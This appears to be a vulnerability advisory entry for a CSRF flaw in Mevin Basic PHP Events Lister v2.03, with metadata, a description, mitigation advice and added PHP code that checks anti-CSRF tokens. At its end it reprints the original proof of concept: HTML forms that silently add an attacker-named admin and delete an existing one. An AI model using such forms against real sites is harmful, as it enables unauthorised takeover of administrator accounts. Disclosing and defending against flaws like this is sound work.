Vendor: Basic PHP Events Lister
Author: Crazy_Hacker
CVSS: 7.5 (HIGH)
Title: CSRF Vulnerability [Add & Delete Admin]
CWE: 352
Product Name: Basic PHP Events Lister
Affected Version From: 02.03
Affected Version To: 02.03
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

Mevin Basic PHP Events Lister v2.03

A CSRF vulnerability exists in Mevin Basic PHP Events Lister v2.03 that allows an attacker to add and delete admin users. The admin scripts user_add.php and user_delete.php accept state-changing POST requests without any anti-CSRF token, so an attacker can craft a malicious HTML page containing a form with hidden fields that, when visited by an authenticated administrator, adds or deletes an admin user.

Mitigation:

The application should include a random token in every state-changing form and check it on submission against a copy stored in the server-side session. The token should be unpredictable and should be changed after each request.
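The mitigation above in working form, as an added example that is not part of the original advisory or the Basic PHP Events Lister code: a session-bound, single-use token issued with the form and verified in constant time before a handler such as admin/user_add.php changes state. admin_add_user() is a hypothetical stand-in for the application's own user-creation logic.

```php
<?php
// Added example (not code from Basic PHP Events Lister): the session-bound
// token defence described above, applied to a handler like admin/user_add.php.
// admin_add_user() is a hypothetical stand-in for the app's own user-creation code.
session_start();
const CSRF_SESSION_KEY = 'csrf_token';

// Issue a fresh, unpredictable token and bind it to the current session.
function csrf_issue_token(): string
{
    $token = bin2hex(random_bytes(32));          // 256 bits from the CSPRNG
    $_SESSION[CSRF_SESSION_KEY] = $token;
    return $token;
}

// Check the submitted token against the session copy. The token is single-use:
// it is discarded whether or not the check succeeds, so the next form gets a new one.
function csrf_verify_token($submitted): bool
{
    $expected = $_SESSION[CSRF_SESSION_KEY] ?? null;
    unset($_SESSION[CSRF_SESSION_KEY]);
    if ($expected === null || !is_string($submitted)) {
        return false;
    }
    return hash_equals($expected, $submitted);   // constant-time comparison
}

function admin_add_user(string $uname, string $pword): void
{
    // Hypothetical placeholder for the application's own user-creation logic.
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify_token($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // A form on another origin cannot read this session's token, so only a
    // submission from the form rendered below reaches this point.
    admin_add_user((string)($_POST['uname'] ?? ''), (string)($_POST['pword'] ?? ''));
    exit('Admin user added');
}
// GET: render the form with the token embedded as a hidden field.
$token = htmlspecialchars(csrf_issue_token(), ENT_QUOTES, 'UTF-8');
?>
<form action="user_add.php" method="post">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <input type="text" name="uname">
  <input type="password" name="pword">
  <input type="submit" value="Add Admin">
</form>
```

A request like the one in the advisory's proof of concept carries no csrf_token field, so csrf_verify_token() returns false and the handler stops with 403 before touching the user table.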

Exploit-DB raw data:

#######################################################
#   Author:       Crazy_Hacker
#   Script:       Mevin Basic PHP Events Lister v2.03
#   Exploit type: CSRF Vulnerability [Add & Delete Admin]
#   Download:     http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip
#   Risk:         High
#   Contact:      jy8@hotmail.com
#######################################################


<form name="setup" action="http://127.0.0.1/events2/admin/user_add.php" method="post">
<input name="uname" type="hidden" value="Crazy_Hacker" />
<input name="pword" type="hidden" value="PWNED!!" /> 
<input type=submit name=submit value="Add Admin">
</form>
<form action="http://localhost/events2/admin/user_delete.php?id=8" method="post">
<input type="hidden" name="ud_id" value="8">
<input type="submit" name="submit" value="Delete Admin">
</form>

				\\// S3crity just Suck5 \\//
				
#EOF